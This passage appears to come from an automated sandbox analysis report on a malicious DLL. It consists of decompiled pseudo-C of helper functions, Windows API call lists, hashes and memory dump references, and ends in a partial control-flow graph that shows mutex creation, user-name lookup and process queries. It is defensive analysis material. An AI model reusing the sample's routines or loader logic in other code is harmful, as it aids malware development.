                • Sleep.KERNEL32(0000000A), ref: 046E3668
                • HeapFree.KERNEL32(00000000), ref: 046E3696
                • RtlLeaveCriticalSection.NTDLL(04C9C0A0), ref: 046E36AB
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                • String ID:
                • API String ID: 58946197-0
                • Opcode ID: 7d10bccc36ab7fd2a155dcd470d3449814db3eb9fa117171da01c9d8e48b5f83
                • Instruction ID: dab4aad8bfbb300b8f81be82dbfcb9b7df194c426673ee1c2e74abfa4998e0c3
                • Opcode Fuzzy Hash: 7d10bccc36ab7fd2a155dcd470d3449814db3eb9fa117171da01c9d8e48b5f83
                • Instruction Fuzzy Hash: C4F0BC74201201DFEB089F2AE889E2977E5EB69740B04A019F802DB350F639FC948E24
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C136C5(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                				struct _FILETIME _v12;
                				void* _t11;
                				void* _t20;
                				void* _t22;
                				void* _t23;
                				signed short* _t24;
                
                				_t22 = __edx;
                				_t23 = E01C123CC(_t11, _a12);
                				if(_t23 == 0) {
                					_t20 = 8;
                				} else {
                					_t24 = _t23 + _a16 * 2;
                					 *_t24 =  *_t24 & 0x00000000;
                					_t20 = E01C16302(__ecx, _a4, _a8, _t23);
                					if(_t20 == 0) {
                						GetSystemTimeAsFileTime( &_v12);
                						 *_t24 = 0x5f;
                						_t20 = E01C15173(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
                					}
                					HeapFree( *0x1c1a290, 0, _t23);
                				}
                				return _t20;
                			}

                APIs
                  • Part of subcall function 01C123CC: lstrlen.KERNEL32(?,00000000,02179B30,00000000,01C13413,02179D0E,69B25F44,?,?,?,?,69B25F44,00000005,01C1A010,4D283A53,?), ref: 01C123D3
                  • Part of subcall function 01C123CC: mbstowcs.NTDLL ref: 01C123FC
                  • Part of subcall function 01C123CC: memset.NTDLL ref: 01C1240E
                • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,021793D4), ref: 01C136FC
                • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,021793D4), ref: 01C13729
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                • String ID: Ut
                • API String ID: 1500278894-8415677
                • Opcode ID: 2eecd87872044d97379bc1615edfd894ef072a030ccd52a340f3acc071d1ce2d
                • Instruction ID: bfa7261f0ded69b5caa7902a8ab62674edcf661fd34f4341c1bcfff47c5fa319
                • Opcode Fuzzy Hash: 2eecd87872044d97379bc1615edfd894ef072a030ccd52a340f3acc071d1ce2d
                • Instruction Fuzzy Hash: 0801F23214024AFBDB226F98DC44F8A7FBDFB86754F104024FA009A054DBB1D964E7A0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memcpy.NTDLL(?,?,?), ref: 046DD80B
                • StrToIntExA.SHLWAPI(00007830,00000001,00000001), ref: 046DD81D
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: memcpy
                • String ID: 0x
                • API String ID: 3510742995-3225541890
                • Opcode ID: 4b32c6941a82bcf5bdf7f44472cd4b2508b7234b578b2d1f61c5338d5a6d7ca6
                • Instruction ID: fae314ed19116d00650d758b65272da7c4ab401cb3fb06d2dc1b997ae9a3aa9b
                • Opcode Fuzzy Hash: 4b32c6941a82bcf5bdf7f44472cd4b2508b7234b578b2d1f61c5338d5a6d7ca6
                • Instruction Fuzzy Hash: 9C017175A0010ABFDB01EFA9C805AEEBBB9EB54740F004425E908E7240E7B5EA09CB91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C11A11(WCHAR* _a4) {
                				long _t11;
                				WCHAR* _t12;
                
                				_t12 = 0;
                				_t11 = ExpandEnvironmentStringsW(_a4, 0, 0);
                				if(_t11 != 0) {
                					_t12 = E01C12114(_t11 + _t11);
                					if(_t12 != 0 && ExpandEnvironmentStringsW(_a4, _t12, _t11) == 0) {
                						E01C12C11(_t12);
                						_t12 = 0;
                					}
                				}
                				return _t12;
                			}

                APIs
                • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,02179CB5,00000000,01C11E60,00410025,00000005,?,00000000), ref: 01C11A22
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 01C11A3F
                  • Part of subcall function 01C12C11: RtlFreeHeap.NTDLL(00000000,00000000,01C17013,00000000,?,?,00000000), ref: 01C12C1D
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: EnvironmentExpandHeapStrings$AllocateFree
                • String ID: pGt
                • API String ID: 1564683301-372155816
                • Opcode ID: 747f65c51a9b45964c22297b3fa675cb46853afbcd17267d0818f7836983584d
                • Instruction ID: db9395dde05172f5774c5ce01e31bd7b4fc9056c62296d9596e286f9031bfc4d
                • Opcode Fuzzy Hash: 747f65c51a9b45964c22297b3fa675cb46853afbcd17267d0818f7836983584d
                • Instruction Fuzzy Hash: 03E09233541573E24231D5BF8C44C4FDE9CEFA79E07190125BB04D3118D634C811E2E0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memset.NTDLL ref: 046DA7C9
                • CloseHandle.KERNEL32(?,?,00000100,?,00000000,?,046C78A1,00000000), ref: 046DA817
                • HeapFree.KERNEL32(00000000,00000000,00000000,00000094,00000000,046D0578,00000000,046C78A1,046C4652,00000000,046C78A1,046C5D2E,00000000,046C78A1,046C5D47,00000000), ref: 046DAB22
                • GetLastError.KERNEL32(?,00000000,?), ref: 046DAE22
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CloseErrorFreeHandleHeapLastmemset
                • String ID:
                • API String ID: 2333114656-0
                • Opcode ID: b12c4fec3ec76f564e75a4e8288453d7575e88a6483ecf77ce6ac32dfd987de9
                • Instruction ID: 5607025021279de7f416efa17c8ba06d5dbdc9042e462937e6e9b93780f5947b
                • Opcode Fuzzy Hash: b12c4fec3ec76f564e75a4e8288453d7575e88a6483ecf77ce6ac32dfd987de9
                • Instruction Fuzzy Hash: 3151DC32F48119BFEF216FE1CC40F7E3669DB45704F00442AF50696140FAB5B952EA66
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046D8EB0: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,046D219F,?,?,?,?), ref: 046D8ED4
                  • Part of subcall function 046D8EB0: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 046D8EE6
                  • Part of subcall function 046D8EB0: wcstombs.NTDLL ref: 046D8EF4
                  • Part of subcall function 046D8EB0: lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,046D219F,?,?,?), ref: 046D8F18
                  • Part of subcall function 046D8EB0: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 046D8F2D
                  • Part of subcall function 046D8EB0: mbstowcs.NTDLL ref: 046D8F3A
                  • Part of subcall function 046D8EB0: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,046D219F,?,?,?,?,?), ref: 046D8F4C
                  • Part of subcall function 046D8EB0: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,046D219F,?,?,?,?,?), ref: 046D8F66
                • GetLastError.KERNEL32 ref: 046D2208
                  • Part of subcall function 046D73C0: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 046D746E
                  • Part of subcall function 046D73C0: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 046D7492
                  • Part of subcall function 046D73C0: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,046CCFFD,?,?,?,?,?,?,?), ref: 046D74A0
                • HeapFree.KERNEL32(00000000,?), ref: 046D2224
                • HeapFree.KERNEL32(00000000,?), ref: 046D2235
                • SetLastError.KERNEL32(00000000), ref: 046D2238
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
                • String ID:
                • API String ID: 3867366388-0
                • Opcode ID: edc7fb01610179929ce80f85674e3b2a76654352a95ac77af87e0a5533c0f268
                • Instruction ID: d884b4763dfa13a893f0321b2266117dcd613a2cbf5d414486182f1b9c4738bc
                • Opcode Fuzzy Hash: edc7fb01610179929ce80f85674e3b2a76654352a95ac77af87e0a5533c0f268
                • Instruction Fuzzy Hash: E5311C36900108FFDF129F99DC4489EBFB5FF58310B10455AFA15A7220E736AA61DF90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046E33E1: lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,046CCFAC,?,?,?,?,?), ref: 046E343A
                  • Part of subcall function 046E33E1: lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,046CCFAC,?,?,?,?,?), ref: 046E3458
                  • Part of subcall function 046E33E1: RtlAllocateHeap.NTDLL(00000000,74E06985,?), ref: 046E3481
                  • Part of subcall function 046E33E1: memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,046CCFAC,?,?,?,?,?), ref: 046E3498
                  • Part of subcall function 046E33E1: HeapFree.KERNEL32(00000000,00000000), ref: 046E34AB
                  • Part of subcall function 046E33E1: memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,046CCFAC,?,?,?,?,?), ref: 046E34BA
                • GetLastError.KERNEL32 ref: 046CD015
                  • Part of subcall function 046D73C0: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 046D746E
                  • Part of subcall function 046D73C0: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 046D7492
                  • Part of subcall function 046D73C0: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,046CCFFD,?,?,?,?,?,?,?), ref: 046D74A0
                • HeapFree.KERNEL32(00000000,?), ref: 046CD031
                • HeapFree.KERNEL32(00000000,?), ref: 046CD042
                • SetLastError.KERNEL32(00000000), ref: 046CD045
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
                • String ID:
                • API String ID: 2451549186-0
                • Opcode ID: e4482d5860e2f586a1bd460693494aa4c77e05d119d0352da8007e6a926ba9e0
                • Instruction ID: 09e6695ce7e30e82a468e50c619c409a32dacdfe1c52d0666aef5801b001c951
                • Opcode Fuzzy Hash: e4482d5860e2f586a1bd460693494aa4c77e05d119d0352da8007e6a926ba9e0
                • Instruction Fuzzy Hash: 77312D31900118EFDF129F9ADC448EDBFB5FF54310B10415AF916A7260E7369A61DF90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: memset
                • String ID:
                • API String ID: 2221118986-0
                • Opcode ID: 70efb25f24c2473581d861dc16d28dd1094acc4c1cf118a1837ce09a6b4c8d7a
                • Instruction ID: 629a55a8ece8308e9595db8887ac22c9c6d5c5e4df7461c0b7c4d6492773126e
                • Opcode Fuzzy Hash: 70efb25f24c2473581d861dc16d28dd1094acc4c1cf118a1837ce09a6b4c8d7a
                • Instruction Fuzzy Hash: DE2188B2601919BBDB249F60DC8097ABB29FF19304B00016CEA4686E10E732F8B19FD5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E01C1774D(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                				intOrPtr* _v8;
                				void* _t17;
                				intOrPtr* _t22;
                				void* _t27;
                				char* _t30;
                				void* _t33;
                				void* _t34;
                				void* _t36;
                				void* _t37;
                				void* _t39;
                				int _t42;
                
                				_t17 = __eax;
                				_t37 = 0;
                				__imp__(_a4, _t33, _t36, _t27, __ecx);
                				_t2 = _t17 + 1; // 0x1
                				_t28 = _t2;
                				_t34 = E01C12114(_t2);
                				if(_t34 != 0) {
                					_t30 = E01C12114(_t28);
                					if(_t30 == 0) {
                						E01C12C11(_t34);
                					} else {
                						_t39 = _a4;
                						_t22 = E01C17AD5(_t39);
                						_v8 = _t22;
                						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                							_a4 = _t39;
                						} else {
                							_t26 = _t22 + 2;
                							_a4 = _t22 + 2;
                							_t22 = E01C17AD5(_t26);
                							_v8 = _t22;
                						}
                						if(_t22 == 0) {
                							__imp__(_t34, _a4);
                							 *_t30 = 0x2f;
                							 *((char*)(_t30 + 1)) = 0;
                						} else {
                							_t42 = _t22 - _a4;
                							memcpy(_t34, _a4, _t42);
                							 *((char*)(_t34 + _t42)) = 0;
                							__imp__(_t30, _v8);
                						}
                						 *_a8 = _t34;
                						_t37 = 1;
                						 *_a12 = _t30;
                					}
                				}
                				return _t37;
                			}

                APIs
                • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,01C1101D,00000000,00000000,74E481D0,02179618,?,?,01C16C0C,?,02179618), ref: 01C17759
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                  • Part of subcall function 01C17AD5: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,01C17787,00000000,00000001,00000001,?,?,01C1101D,00000000,00000000,74E481D0,02179618), ref: 01C17AE3
                  • Part of subcall function 01C17AD5: StrChrA.SHLWAPI(?,0000003F,?,?,01C1101D,00000000,00000000,74E481D0,02179618,?,?,01C16C0C,?,02179618,0000EA60,?), ref: 01C17AED
                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,01C1101D,00000000,00000000,74E481D0,02179618,?,?,01C16C0C), ref: 01C177B7
                • lstrcpy.KERNEL32(00000000,74E481D0), ref: 01C177C7
                • lstrcpy.KERNEL32(00000000,00000000), ref: 01C177D3
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                • String ID:
                • API String ID: 3767559652-0
                • Opcode ID: 1ea4af261c6f9b2705e27304f59db54b5f57d03befab22514e22bedf7b1cd23c
                • Instruction ID: 44917f562df2cadf20377a86afd5ecba2684762f1abac6cbd5a11308842d9d19
                • Opcode Fuzzy Hash: 1ea4af261c6f9b2705e27304f59db54b5f57d03befab22514e22bedf7b1cd23c
                • Instruction Fuzzy Hash: B021D236540356EBDB129FB8CC84E9A7FA9EF57290F254050F9059B209EB31CA00E7E0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,046CCB3C,00000000,00000000,74E48170,00000008,0000EA60,00000000,?,?,046C567E), ref: 046C7560
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                  • Part of subcall function 046E64E1: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,046C758E,00000000,00000001,00000001,?,?,046CCB3C,00000000,00000000,74E48170,00000008,0000EA60), ref: 046E64EF
                  • Part of subcall function 046E64E1: StrChrA.SHLWAPI(?,0000003F,?,?,046CCB3C,00000000,00000000,74E48170,00000008,0000EA60,00000000,?,?,046C567E,?,?), ref: 046E64F9
                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,046CCB3C,00000000,00000000,74E48170,00000008,0000EA60,00000000), ref: 046C75BE
                • lstrcpy.KERNEL32(00000000,74E48170), ref: 046C75CE
                • lstrcpy.KERNEL32(00000000,00000000), ref: 046C75DA
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                • String ID:
                • API String ID: 3767559652-0
                • Opcode ID: e8ffd97d0cca01e2180d5cd854ed2afe844121d46202e59a4f04c40aafc0bbe8
                • Instruction ID: 7ed8a7fd1d0404b6004da9985b22fe3a616d2a0bb7e6e4bcf8810f81270a3d51
                • Opcode Fuzzy Hash: e8ffd97d0cca01e2180d5cd854ed2afe844121d46202e59a4f04c40aafc0bbe8
                • Instruction Fuzzy Hash: 9021AF72500216EFDB12AF75C848ABF7FE8EF15295B448068F9059B201FA75EE008BB0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: memset
                • String ID:
                • API String ID: 2221118986-0
                • Opcode ID: eef43bb9de78a7a91ee7f849e5bd04c0e4f034790cff06ae31a3629565e2eb27
                • Instruction ID: 976613550b56a186376e1e1f427c6f5c7428f4d992e504e5de48d56e61e25d0e
                • Opcode Fuzzy Hash: eef43bb9de78a7a91ee7f849e5bd04c0e4f034790cff06ae31a3629565e2eb27
                • Instruction Fuzzy Hash: BE11A07390190ABBDB20AFA1DC40E76BB28FF09304B04052DFA4992D51E772F5B19BD5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C16C7B(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                				void* _v8;
                				void* _t18;
                				int _t25;
                				int _t29;
                				int _t34;
                
                				_t29 = lstrlenW(_a4);
                				_t25 = lstrlenW(_a8);
                				_t18 = E01C12114(_t25 + _t29 + _t25 + _t29 + 2);
                				_v8 = _t18;
                				if(_t18 != 0) {
                					_t34 = _t29 + _t29;
                					memcpy(_t18, _a4, _t34);
                					_t10 = _t25 + 2; // 0x2
                					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                				}
                				return _v8;
                			}

                APIs
                • lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,021793D4,?,01C15D75,004F0053,021793D4,?,?,?,?,?,?,01C154C0), ref: 01C16C8B
                • lstrlenW.KERNEL32(01C15D75,?,01C15D75,004F0053,021793D4,?,?,?,?,?,?,01C154C0), ref: 01C16C92
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,01C15D75,004F0053,021793D4,?,?,?,?,?,?,01C154C0), ref: 01C16CB2
                • memcpy.NTDLL(74E069A0,01C15D75,00000002,00000000,004F0053,74E069A0,?,?,01C15D75,004F0053,021793D4), ref: 01C16CC5
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: lstrlenmemcpy$AllocateHeap
                • String ID:
                • API String ID: 2411391700-0
                • Opcode ID: bac787b2860519021eb8c7cf3a05324efd5cfe660d77334ecd7f548a80737e21
                • Instruction ID: 01c01db6dcc5f53f681a5efa01d2bff81f4e95e8c7a4ab0e448018c136a73468
                • Opcode Fuzzy Hash: bac787b2860519021eb8c7cf3a05324efd5cfe660d77334ecd7f548a80737e21
                • Instruction Fuzzy Hash: 13F04F36900119FBCF10DFE9CC44CDE7BACEF0A2587118062EA08D7205E731EA14ABA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(69B25F44,?,?,00000000,046C357F,00000000,?,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 046C1D23
                • lstrlen.KERNEL32(?,?,?,00000000,046C357F,00000000,?,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 046C1D28
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • memcpy.NTDLL(00000000,?,00000000,?,?,?,00000000,046C357F,00000000,?,?,00000000,69B25F44,?,?,?), ref: 046C1D44
                • lstrcpy.KERNEL32(00000000,?), ref: 046C1D62
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                • String ID:
                • API String ID: 1697500751-0
                • Opcode ID: b95f21a1c076f9561ad4b5e6ede7fee3c27627a38d1f88b7629a601173c73882
                • Instruction ID: 2522569b4c82265460c4bc2b651049ef0180ace83f671d9e009ab1d8a6e9d0ef
                • Opcode Fuzzy Hash: b95f21a1c076f9561ad4b5e6ede7fee3c27627a38d1f88b7629a601173c73882
                • Instruction Fuzzy Hash: 44F0C2B6400B41EBD731AA6A9C48EABBB99EF86311B04451AE94483211E635E4148FB1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(02179B10,00000000,00000000,7691C740,01C176A0,00000000), ref: 01C15F56
                • lstrlen.KERNEL32(?), ref: 01C15F5E
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • lstrcpy.KERNEL32(00000000,02179B10), ref: 01C15F72
                • lstrcat.KERNEL32(00000000,?), ref: 01C15F7D
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                • String ID:
                • API String ID: 74227042-0
                • Opcode ID: 0b847a01bbc8a9c239d8b83cb925578ca5498bf2182713671a7fcbf09687ff1c
                • Instruction ID: a5c14c4816c619a12ccc661fcbc607e08962731c2a02f5ae424aee1d057a88f1
                • Opcode Fuzzy Hash: 0b847a01bbc8a9c239d8b83cb925578ca5498bf2182713671a7fcbf09687ff1c
                • Instruction Fuzzy Hash: 82E09233941261AB87219BE8AC48D9FBBACFFAFA103040416FA01D3118C734C9009BA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(04C9CF38,00000000,00000000,74E481D0,046D09F9,00000000), ref: 046CD28A
                • lstrlen.KERNEL32(?), ref: 046CD292
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • lstrcpy.KERNEL32(00000000,04C9CF38), ref: 046CD2A6
                • lstrcat.KERNEL32(00000000,?), ref: 046CD2B1
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                • String ID:
                • API String ID: 74227042-0
                • Opcode ID: f838e6b2033a59a0c730c8b786be5623ce95e9656145aa0124028e41544e41ef
                • Instruction ID: dad42c0cc69304f458bcb625cf8dc36040ec65ce60432bd31c3f3cb2e06c34b1
                • Opcode Fuzzy Hash: f838e6b2033a59a0c730c8b786be5623ce95e9656145aa0124028e41544e41ef
                • Instruction Fuzzy Hash: 0EE01273501621AB87117BE5AC48C6BBBEDEF99651704541AF600D7100E769DC019BB1
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 42 4bd4560-4bd45a9 RtlInitializeCriticalSection call 4bc8f9e 45 4bd45ab-4bd45cf memset RtlInitializeCriticalSection 42->45 46 4bd45d1-4bd45d3 42->46 47 4bd45d4-4bd45da 45->47 46->47 48 4bd49dc-4bd49e6 47->48 49 4bd45e0-4bd4604 CreateMutexA GetLastError 47->49 50 4bd4606-4bd460b 49->50 51 4bd4621-4bd4623 49->51 52 4bd460d-4bd461a CloseHandle 50->52 53 4bd461f 50->53 54 4bd4629-4bd4634 call 4bd6126 51->54 55 4bd49d7 51->55 52->55 53->51 56 4bd49db 54->56 59 4bd463a-4bd4645 call 4bd75a8 54->59 55->56 56->48 59->56 62 4bd464b-4bd465d GetUserNameA 59->62 63 4bd465f-4bd4677 RtlAllocateHeap 62->63 64 4bd4681-4bd4691 62->64 63->64 65 4bd4679-4bd467f GetUserNameA 63->65 66 4bd469a-4bd46b7 NtQueryInformationProcess 64->66 67 4bd4693-4bd4698 64->67 65->64 69 4bd46bd-4bd46cc OpenProcess 66->69 70 4bd46b9 66->70 67->66 68 4bd46e1-4bd46eb 67->68 71 4bd46ed-4bd4709 GetShellWindow GetWindowThreadProcessId 68->71 72 4bd4728-4bd472c 68->72 73 4bd46ce-4bd46d3 GetLastError 69->73 74 4bd46da-4bd46db CloseHandle 69->74 70->69 75 4bd471b-4bd4722 71->75 76 4bd470b-4bd4711 71->76 77 4bd472e-4bd473e memcpy 72->77 78 4bd4741-4bd4758 call 4bd7d21 72->78 73->68 79 4bd46d5 73->79 74->68 75->72 81 4bd4724 75->81 76->75 80 4bd4713-4bd4719 76->80 77->78 87 4bd475a-4bd475e 78->87 88 4bd4765-4bd476b 78->88 83 4bd4771-4bd47ad call 4bc9677 call 4bc8ffc call 4be41cf 79->83 80->72 81->72 95 4bd47af-4bd47be CreateEventA call 4bc57e0 83->95 